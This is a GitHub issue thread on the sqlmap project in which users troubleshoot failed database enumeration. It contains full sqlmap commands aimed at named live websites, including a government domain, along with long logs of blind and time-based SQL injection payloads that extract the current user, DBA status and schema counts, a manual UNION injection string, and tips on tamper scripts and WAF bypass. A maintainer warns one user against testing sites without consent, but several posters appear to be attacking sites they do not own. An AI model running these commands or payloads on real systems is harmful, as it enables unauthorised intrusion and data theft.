Sqlmap: [CRITICAL] unable to retrieve the database names

Created on 4 Dec 2013  Â·  23Comments  Â·  Source: sqlmapproject/sqlmap

Hello! Why does not searchable database! I have changed in the Tour test comparison page

C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
--level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
osoft SQL Server"



[09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 531 HTTP(s) req
uests:

---
Place: GET
Parameter: year
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: year=2011 AND 2168=2168

---
[09:54:27] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[09:54:27] [INFO] testing MySQL
[09:54:27] [WARNING] the back-end DBMS is not MySQL
[09:54:27] [INFO] testing Oracle
[09:54:28] [WARNING] the back-end DBMS is not Oracle
[09:54:28] [INFO] testing PostgreSQL
[09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
[09:54:29] [INFO] testing Microsoft SQL Server
[09:54:29] [INFO] confirming Microsoft SQL Server
[09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:54:31] [INFO] fetching database names
[09:54:31] [INFO] fetching number of databases
[09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:54:31] [INFO] retrieved:
[09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:54:33] [ERROR] unable to retrieve the number of databases
[09:54:33] [INFO] retrieved:
[09:54:36] [INFO] falling back to current database
[09:54:36] [INFO] fetching current database
[09:54:36] [INFO] retrieved:
[09:54:40] [CRITICAL] unable to retrieve the database names
[09:54:40] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 145 times

[*] shutting down at 09:54:40


C:\Python27\sqlmap>
invalid support

Most helpful comment

Just an FYI for anyone else searching for this error:

The application I was testing was erroring (500) when it encountered the < and > characters (mssql). The between tamper script solved this for me --tamper between.

All 23 comments

Few things:
1) parameter length constraint mechanism detected - that means that backend is stripping longer payloads
2) you are using tamper scripts - why?
3) are you able retrieve any data from that server? e.g. --banner

Will
1) parameter length constraint mechanism detected - that means that backend is stripping longer payloads
Solutions ??

1)C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
--level 5 --risk 3 --dbs --dbms "Microsoft SQL Server" --banner

[22:37:44] [WARNING] false positive or unexploitable injection point detected
[22:37:44] [WARNING] there is a possibility that the character '>' is filtered b
y the back-end server. You can try to rerun with '--tamper=between'


2)C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
--level 5 --risk 3 --dbs --dbms "Microsoft SQL Server" --banner --tamper=between

[22:19:22] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[22:19:22] [INFO] testing Microsoft SQL Server
[22:19:23] [INFO] confirming Microsoft SQL Server
[22:19:27] [INFO] the back-end DBMS is Microsoft SQL Server
[22:19:27] [INFO] fetching banner
[22:19:27] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[22:19:27] [INFO] retrieved:
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[22:19:35] [INFO] fetching banner
[22:19:35] [INFO] retrieved:
[22:19:42] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
banner: None
[22:19:42] [INFO] fetching database names
[22:19:42] [INFO] fetching number of databases
[22:19:42] [INFO] retrieved:
[22:19:45] [ERROR] unable to retrieve the number of databases
[22:19:45] [INFO] retrieved:
[22:19:54] [INFO] falling back to current database
[22:19:54] [INFO] fetching current database
[22:19:54] [INFO] retrieved:
[22:20:01] [CRITICAL] unable to retrieve the database names

[*] shutting down at 22:20:01

I would say that some kind of protection is going on as you are not able to retrieve anything

@aiongw either a protection (custom or off-the-shelf filter) is in place or the session user does not have privileges to enumerate database schema and other information (unlikely). Try to run with --current-user --is-dba --parse-errors -v 3 and send us the output please.

Is it false positives

[10:25:13] [PAYLOAD] 2011 AND 95 NOT BETWEEN 0 AND 97
[10:25:14] [PAYLOAD] 2011 AND 97 NOT BETWEEN 0 AND 61
[10:25:14] [PAYLOAD] 2011 AND 2260=2260  

[10:25:14] [WARNING] parameter length constraint mechanism detected (e.g. Suh
n patch). Potential problems in enumeration phase can be expected
GET parameter 'year' is vulnerable. Do you want to keep testing the others (i
ny)? [y/N] n
sqlmap identified the following injection points with a total of 198 HTTP(s)
uests:
---
Place: GET
Parameter: year
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: year=2011 AND 9755=9755
    Vector: AND [INFERENCE]
---
[10:25:17] [WARNING] changes made by tampering scripts are not included in sh
 payload content(s)
[10:25:17] [INFO] testing Microsoft SQL Server
[10:25:17] [PAYLOAD] 2011 AND BINARY_CHECKSUM(1944)=BINARY_CHECKSUM(1944)
[10:25:18] [INFO] confirming Microsoft SQL Server
[10:25:18] [PAYLOAD] 2011 AND HOST_NAME()=HOST_NAME()
[10:25:18] [PAYLOAD] 2011 AND XACT_STATE()=XACT_STATE()
[10:25:18] [PAYLOAD] 2011 AND SYSDATETIME()=SYSDATETIME()
[10:25:19] [PAYLOAD] 2011 AND CONCAT(NULL,NULL)=CONCAT(NULL,NULL)
[10:25:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:25:19] [INFO] fetching current user
[10:25:19] [WARNING] running in a single-thread mode. Please consider usage o
ption '--threads' for faster data retrieval
[10:25:19] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 64
[10:25:19] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 32
[10:25:20] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 16
[10:25:20] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 8
[10:25:20] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 4
[10:25:20] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 2
[10:25:21] [PAYLOAD] 2011 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(SYSTEM_US
AS NVARCHAR(4000)),CHAR(32))),1,1)) NOT BETWEEN 0 AND 1
[10:25:21] [INFO] retrieved:
[10:25:21] [DEBUG] performed 7 queries in 1.79 seconds
[10:25:21] [WARNING] in case of continuous data retrieval problems you are ad
ed to try a switch '--no-cast' or switch '--hex'
current user:   None
[10:25:21] [INFO] testing if current user is DBA
[10:25:21] [PAYLOAD] 2011 AND (SELECT (CASE WHEN (IS_SRVROLEMEMBER(CHAR(115)+
R(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) THEN CH
49) ELSE CHAR(48) END))=CHAR(49)
current user is DBA:    False
[10:25:21] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap
tput\[REDACTED]'

[*] shutting down at 10:25:21


C:\Python27\sqlmap>

Are you able to retrieve --banner? If not, then it's most probably a fakse positive

@aiongw do not post public links and do not assess sites that you have not got written consent. From the look of it, given --current-user failed at enumerating the username, certain words used by sqlmap to construct the statement may be filtered. Try to run with --no-cast.

Please what can I do ? I can't get Databases;
WARNING] HTTP error codes detected during run: 406 (Not Acceptable)

@DeadScript are you able to retrieve anything? For example --banner or --users? In your case either you've failed in provided parameters (double check parameter values) or the target is protected with WAF.

No Brother, i can't retrieve --banner nor --users ! The Sqlmap show that the parameter is injectable,

[12:09:51] [INFO] resuming back-end DBMS 'mysql'
[12:09:51] [INFO] testing connection to the target URL
[12:09:52] [INFO] heuristics detected web page charset 'ISO-8859-2'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: pro_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro_id=36 AND 4899=4899

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pro_id=36 AND SLEEP(5)

[12:09:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[12:09:52] [INFO] fetching database names
[12:09:52] [INFO] fetching number of databases
[12:09:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:09:52] [INFO] retrieved:
[12:09:54] [WARNING] time-based comparison requires larger statistical model, please wait...........

Then it's protected with WAF
On Sep 13, 2014 2:13 PM, "DeadScript" [email protected] wrote:

No Brother, i can't retrieve --banner nor --users ! The Sqlmap show that
the parameter is injectable,

[12:09:51] [INFO] resuming back-end DBMS 'mysql'
[12:09:51] [INFO] testing connection to the target URL
[12:09:52] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:

Place: GET
Parameter: pro_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro_id=36 AND 4899=4899

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pro_id=36 AND SLEEP(5)


[12:09:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[12:09:52] [INFO] fetching database names
[12:09:52] [INFO] fetching number of databases
[12:09:52] [WARNING] running in a single-thread mode. Please consider
usage of option '--threads' for faster data retrieval
[12:09:52] [INFO] retrieved:
[12:09:54] [WARNING] time-based comparison requires larger statistical
model, please wait...........

—
Reply to this email directly or view it on GitHub
https://github.com/sqlmapproject/sqlmap/issues/569#issuecomment-55492210
.

So is there a solution while it's protected with WAF ?

Learn how to bypass it

what is the --no-cast command for?

@jitterbud sqlmap casts values before retrieval to a string-like type (e.g. varchar). That provides us the most flexible way how to retrieve data and not worry too much whether there will be problems if one value is integer or one value is datetime. Everything is string.

But, there are always some exceptions when that casting fails for some unknown reason (e.g. because of data incompatibility with varchar type). In those kind of cases one potential solution is the usage of switch --no-cast. That way casting is skipped and we hope that maybe the original data type will work out of box in data retrieval phase. This really works in some strange cases.

i had the same problem the server was protected using some waf, so i added --no-cast and it retrieved the database, but in time-based injection...

Just an FYI for anyone else searching for this error:

The application I was testing was erroring (500) when it encountered the < and > characters (mssql). The between tamper script solved this for me --tamper between.

@stamparm hi :) I am new can you help me please
I have a problem I can get database but can't tables why [CRITICAL] unable to retrieve the tables for any database what is these
I use these parameters
sqlmap -u "http://www.kodef.gov.tr/album_1.asp?albumID=87" --tables -batch --random-agent --level=5 --risk=3 -D kodefGovTr

sqlmap.py -u "URL" --data="name=asd&email=asdfas%40gmail.lcom&contactno=s&pname=c&msg=c&submit=" -p "name"

[12:30:35] [INFO] testing connection to the target URL
[12:30:35] [INFO] testing if the target URL is stable
[12:30:36] [INFO] target URL is stable
[12:30:37] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
[12:30:37] [INFO] testing for SQL injection on POST parameter 'name'
[12:30:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:30:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:30:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:30:44] [INFO] heuristics detected web page charset 'ascii'
[12:30:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:30:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:30:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:30:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:30:57] [INFO] testing 'MySQL inline queries'
[12:30:58] [INFO] testing 'PostgreSQL inline queries'
[12:30:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:30:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:31:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:31:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:31:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:31:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:31:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:31:12] [INFO] testing 'Oracle AND time-based blind'
[12:31:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:31:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[12:31:25] [INFO] target URL appears to be UNION injectable with 4 columns
[12:31:25] [WARNING] applying generic concatenation (CONCAT)
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[12:32:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[12:32:57] [WARNING] POST parameter 'name' does not seem to be injectable
[12:32:57] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[12:32:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times

some thing wrong, UNION query
manual:

unsub.php?uid=&eid=' UNION ALL SELECT NULL,NULL,table_name from information_schema.tables limit 660,2-- fgtd
(true)

by sqlmap:

unable to retrieve the number of tables

V: {1.2.5.5#dev}

gdattacker@gdattacker-VirtualBox:~/Desktop/Issues$ sqlmap -r practice.txt -p tags --dbs --batch --random-agent --level=3 --risk=3 --time-sec 10 --current-user --is-dba --parse-errors -v 3
___
__H__
___ ___[)]_____ ___ ___ {1.0.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:56:31

[07:56:31] [INFO] parsing HTTP request from 'practice.txt'
[07:56:31] [DEBUG] not a valid WebScarab log data
[07:56:31] [DEBUG] cleaning up configuration parameters
[07:56:31] [DEBUG] setting the HTTP timeout
[07:56:31] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/txt/user-agents.txt'
[07:56:31] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'
[07:56:31] [DEBUG] creating HTTP requests opener object
[07:56:32] [DEBUG] setting the HTTP Referer header to the target URL
[07:56:32] [DEBUG] provided parameter 'tags' is not inside the Cookie
[07:56:32] [INFO] resuming back-end DBMS 'mysql'
[07:56:32] [DEBUG] resolving hostname 'test.test.org'
[07:56:32] [INFO] testing connection to the target URL
[07:56:33] [DEBUG] declared web page charset 'iso-8859-1'
sqlmap got a 301 redirect to 'https://test.test.org/recommended.php'. Do you want to follow? [Y/n] Y
[07:56:33] [DEBUG] used the default behaviour, running in batch mode
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[07:56:33] [DEBUG] used the default behaviour, running in batch mode
[07:56:35] [DEBUG] declared web page charset 'utf-8'

sqlmap resumed the following injection point(s) from stored session:

Parameter: tags (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=1403875&tags=1' AND 5387=5387 AND 'rvxH'='rvxH
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=1403875&tags=1' AND SLEEP(10) AND 'Ernu'='Ernu

Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

[07:56:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[07:56:35] [INFO] fetching current user
[07:56:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[07:56:35] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>64 AND 'tOna'='tOna
[07:56:36] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>32 AND 'tOna'='tOna
[07:56:37] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>1 AND 'tOna'='tOna
[07:56:38] [INFO] retrieved:
[07:56:38] [DEBUG] performed 3 queries in 3.71 seconds
[07:56:38] [PAYLOAD] 1' AND 3411=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>64),SLEEP(10),3411) AND 'xtKx'='xtKx
[07:56:38] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[07:57:13] [PAYLOAD] 1' AND 3411=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>32),SLEEP(10),3411) AND 'xtKx'='xtKx
[07:57:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[07:57:14] [PAYLOAD] 1' AND 3411=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>1),SLEEP(10),3411) AND 'xtKx'='xtKx
[07:57:15] [INFO] retrieved:
[07:57:15] [DEBUG] performed 3 queries in 36.97 seconds
[07:57:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[07:57:15] [INFO] testing if current user is DBA
[07:57:15] [INFO] fetching current user
[07:57:15] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>64 AND 'PfmU'='PfmU
[07:57:17] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>32 AND 'PfmU'='PfmU
[07:57:18] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>1 AND 'PfmU'='PfmU
[07:57:19] [INFO] retrieved:
[07:57:19] [DEBUG] performed 3 queries in 3.71 seconds
[07:57:19] [PAYLOAD] 1' AND 7851=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>64),SLEEP(10),7851) AND 'oIrJ'='oIrJ
[07:57:20] [PAYLOAD] 1' AND 7851=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>32),SLEEP(10),7851) AND 'oIrJ'='oIrJ
[07:57:22] [PAYLOAD] 1' AND 7851=IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1))>1),SLEEP(10),7851) AND 'oIrJ'='oIrJ
[07:57:23] [INFO] retrieved:
[07:57:23] [DEBUG] performed 3 queries in 3.72 seconds
[07:57:23] [PAYLOAD] 1' AND (SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x4e6f6e65 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END))=1 AND 'HJPK'='HJPK
current user is DBA: False
[07:57:24] [INFO] fetching database names
[07:57:24] [INFO] fetching number of databases
[07:57:24] [PAYLOAD] 1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51 AND 'NuXU'='NuXU
[07:57:25] [PAYLOAD] 1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48 AND 'NuXU'='NuXU
[07:57:27] [PAYLOAD] 1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>1 AND 'NuXU'='NuXU
[07:57:28] [INFO] retrieved:
[07:57:28] [DEBUG] performed 3 queries in 3.85 seconds
[07:57:28] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51),SLEEP(10),9246) AND 'DoYX'='DoYX
[07:57:28] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>150000),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:29] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>692843),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:31] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>429538),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:32] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>790476),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:33] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>324701),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:35] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>303716),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:36] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>337402),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:37] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>824705),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:38] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>525831),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:40] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>960198),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:41] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>476235),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:42] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>715224),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:43] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>411119),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:45] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>131945),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:46] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>963147),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:47] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>140665),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:48] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>768732),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:50] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>450716),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:51] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>610101),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:52] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>992411),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:53] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>972334),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:55] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>230935),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:56] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>610052),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:57] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>761965),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:57:59] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>184420),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:58:01] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>270535),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:58:04] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>566138),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:58:06] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>814687),SLEEP(10),9246) AND 'DoYX'='DoYX
.
[07:58:07] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>993561),SLEEP(10),9246) AND 'DoYX'='DoYX
.
